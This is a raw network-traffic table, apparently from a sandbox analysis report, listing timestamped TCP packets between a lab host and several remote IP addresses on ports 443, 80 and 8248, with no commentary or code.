Mar 27, 2025 18:29:10.271562099 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.271913052 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.271931887 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.271979094 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.271985054 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.272030115 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.272418976 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.272433996 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.272454977 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.272494078 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.272499084 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.272551060 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.272834063 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.272883892 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.272888899 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.272907972 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.272921085 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.272950888 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.272973061 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.273252964 CET	49740	443	192.168.2.4	185.174.100.20
Mar 27, 2025 18:29:10.273267031 CET	443	49740	185.174.100.20	192.168.2.4
Mar 27, 2025 18:29:10.908029079 CET	49678	443	192.168.2.4	20.189.173.27
Mar 27, 2025 18:29:11.112097979 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.112114906 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.112195969 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.112339973 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.112353086 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.303219080 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.303284883 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.304461956 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.304471016 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.304692984 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.305027008 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.348274946 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.480964899 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.481755018 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.481794119 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.481806993 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.481817961 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.481868029 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.481873989 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.487111092 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.487143040 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.487163067 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.487170935 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.487215042 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.490197897 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.493247986 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.493297100 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.493304968 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.499897003 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.499946117 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.499946117 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.499957085 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.500004053 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.502362013 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.505409002 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.505458117 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.505466938 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.511529922 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.511571884 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.511593103 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.511962891 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.512017965 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.514539957 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.561130047 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.561136007 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.571937084 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.571963072 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.571985960 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.571993113 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.572040081 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.574759007 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.577438116 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.577652931 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.577658892 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.583134890 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.583189964 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.583197117 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.584431887 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.584480047 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.584486008 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.588602066 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.588629961 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.588673115 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.588680983 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.588737011 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.591022015 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.606709003 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.606718063 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.606774092 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.606791973 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.606801987 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.606848001 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.617944002 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.617963076 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.618010998 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.618019104 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.618031979 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.618052959 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.620975971 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.621032953 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.621037960 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.621077061 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.621318102 CET	49742	443	192.168.2.4	151.101.2.137
Mar 27, 2025 18:29:11.621329069 CET	443	49742	151.101.2.137	192.168.2.4
Mar 27, 2025 18:29:11.773252964 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:11.773278952 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:11.773334980 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:11.773433924 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:11.773461103 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:11.773535013 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:11.773586988 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:11.773602009 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:11.773667097 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:11.773682117 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.055236101 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.055303097 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.055753946 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.055833101 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.056382895 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.056391001 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.056608915 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.057137012 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.057470083 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.057476997 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.057708025 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.057940960 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.100295067 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.100297928 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.148017883 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.148085117 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.148299932 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.148313046 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.148678064 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.148991108 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.149061918 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.149077892 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.151106119 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.151137114 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.151144981 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.151154995 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.151185036 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.151187897 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.151226997 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.152000904 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.152045965 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.152061939 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.158024073 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.158052921 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.158088923 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.158098936 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.158190012 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.161572933 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.164120913 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.164174080 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.164185047 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.172013998 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.172035933 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.172075987 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.172086000 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.172126055 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.173322916 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.177067041 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.177123070 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.177131891 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.182403088 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.182563066 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.182576895 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.185998917 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.186140060 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.186146975 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.196250916 CET	49743	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.196270943 CET	443	49743	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.236787081 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.236805916 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.242650032 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.242676973 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.242717028 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.242728949 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.242783070 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.244993925 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.250122070 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.250152111 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.250195980 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.250205994 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.250267982 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.252401114 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.254709005 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.254753113 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.254760981 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.260940075 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.260992050 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.260998964 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.261271000 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.261302948 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.261315107 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.261322975 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.261490107 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.262245893 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.262310028 CET	443	49744	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.262368917 CET	49744	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.472718000 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.472723961 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.472778082 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.472935915 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.472965956 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.473206043 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.473238945 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.473253965 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.473814964 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.473835945 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.630753040 CET	49681	80	192.168.2.4	2.17.190.73
Mar 27, 2025 18:29:12.665587902 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.665678978 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.666117907 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.666126013 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.666362047 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.666670084 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.669630051 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.669708967 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.670082092 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.670088053 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.670829058 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.671258926 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.708297014 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.712286949 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.855082035 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.855180979 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.855216980 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.855232954 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.855289936 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.855304956 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.855313063 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.855341911 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.855366945 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.855412006 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.855442047 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.855755091 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.855813026 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.855829000 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.856132984 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.856174946 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.856182098 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.857270002 CET	49750	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.857285023 CET	443	49750	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.858875036 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.858937025 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.858942986 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.862010002 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.862063885 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.862071037 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.865397930 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.865488052 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.865494967 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.871576071 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.871639967 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.871646881 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.874784946 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.874854088 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.874861002 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.878043890 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.878096104 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.878103018 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.886224985 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.886271000 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.886277914 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.887528896 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.887581110 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.887588024 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.929747105 CET	49711	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:12.929747105 CET	49711	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:12.929747105 CET	49711	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:12.931504011 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.931518078 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.931536913 CET	49681	80	192.168.2.4	2.17.190.73
Mar 27, 2025 18:29:12.950519085 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.950594902 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.950603962 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.950625896 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.950670958 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.953474045 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.958594084 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.958674908 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.958728075 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.958735943 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.958868027 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.960891962 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.963284016 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.963331938 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.963339090 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.967485905 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.967555046 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.967561007 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.969614983 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.969688892 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.969722033 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.969727993 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.970158100 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.970594883 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:12.970663071 CET	443	49749	199.232.88.193	192.168.2.4
Mar 27, 2025 18:29:12.970809937 CET	49749	443	192.168.2.4	199.232.88.193
Mar 27, 2025 18:29:13.024698019 CET	443	49711	204.79.197.222	192.168.2.4
Mar 27, 2025 18:29:13.024719954 CET	443	49711	204.79.197.222	192.168.2.4
Mar 27, 2025 18:29:13.024827957 CET	443	49711	204.79.197.222	192.168.2.4
Mar 27, 2025 18:29:13.026206970 CET	443	49711	204.79.197.222	192.168.2.4
Mar 27, 2025 18:29:13.026243925 CET	443	49711	204.79.197.222	192.168.2.4
Mar 27, 2025 18:29:13.026290894 CET	49711	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:13.026331902 CET	49711	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:13.026746035 CET	49711	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:13.028498888 CET	443	49711	204.79.197.222	192.168.2.4
Mar 27, 2025 18:29:13.028537989 CET	443	49711	204.79.197.222	192.168.2.4
Mar 27, 2025 18:29:13.028574944 CET	49711	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:13.028625965 CET	49711	443	192.168.2.4	204.79.197.222
Mar 27, 2025 18:29:13.121576071 CET	443	49711	204.79.197.222	192.168.2.4
Mar 27, 2025 18:29:13.314012051 CET	49678	443	192.168.2.4	20.189.173.27
Mar 27, 2025 18:29:13.532859087 CET	49681	80	192.168.2.4	2.17.190.73
Mar 27, 2025 18:29:14.752377987 CET	49681	80	192.168.2.4	2.17.190.73
Mar 27, 2025 18:29:16.251470089 CET	443	49734	142.251.40.164	192.168.2.4
Mar 27, 2025 18:29:16.251591921 CET	443	49734	142.251.40.164	192.168.2.4
Mar 27, 2025 18:29:16.251657963 CET	49734	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:29:16.673264980 CET	49734	443	192.168.2.4	142.251.40.164
Mar 27, 2025 18:29:16.673289061 CET	443	49734	142.251.40.164	192.168.2.4
Mar 27, 2025 18:29:17.161959887 CET	49681	80	192.168.2.4	2.17.190.73
Mar 27, 2025 18:29:18.129199982 CET	49678	443	192.168.2.4	20.189.173.27
Mar 27, 2025 18:29:19.341670990 CET	49671	443	192.168.2.4	204.79.197.203
Mar 27, 2025 18:29:21.972582102 CET	49681	80	192.168.2.4	2.17.190.73
Mar 27, 2025 18:29:24.494569063 CET	49754	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:29:24.661398888 CET	8248	49754	185.174.100.76	192.168.2.4
Mar 27, 2025 18:29:24.662811041 CET	49754	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:29:24.663117886 CET	49754	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:29:24.830370903 CET	8248	49754	185.174.100.76	192.168.2.4
Mar 27, 2025 18:29:24.830426931 CET	8248	49754	185.174.100.76	192.168.2.4
Mar 27, 2025 18:29:24.830466032 CET	8248	49754	185.174.100.76	192.168.2.4
Mar 27, 2025 18:29:24.830765963 CET	49754	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:29:24.832722902 CET	49754	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:29:24.833066940 CET	49754	8248	192.168.2.4	185.174.100.76
Mar 27, 2025 18:29:25.000355959 CET	8248	49754	185.174.100.76	192.168.2.4
Mar 27, 2025 18:29:25.000623941 CET	8248	49754	185.174.100.76	192.168.2.4
Mar 27, 2025 18:29:25.000734091 CET	8248	49754	185.174.100.76	192.168.2.4
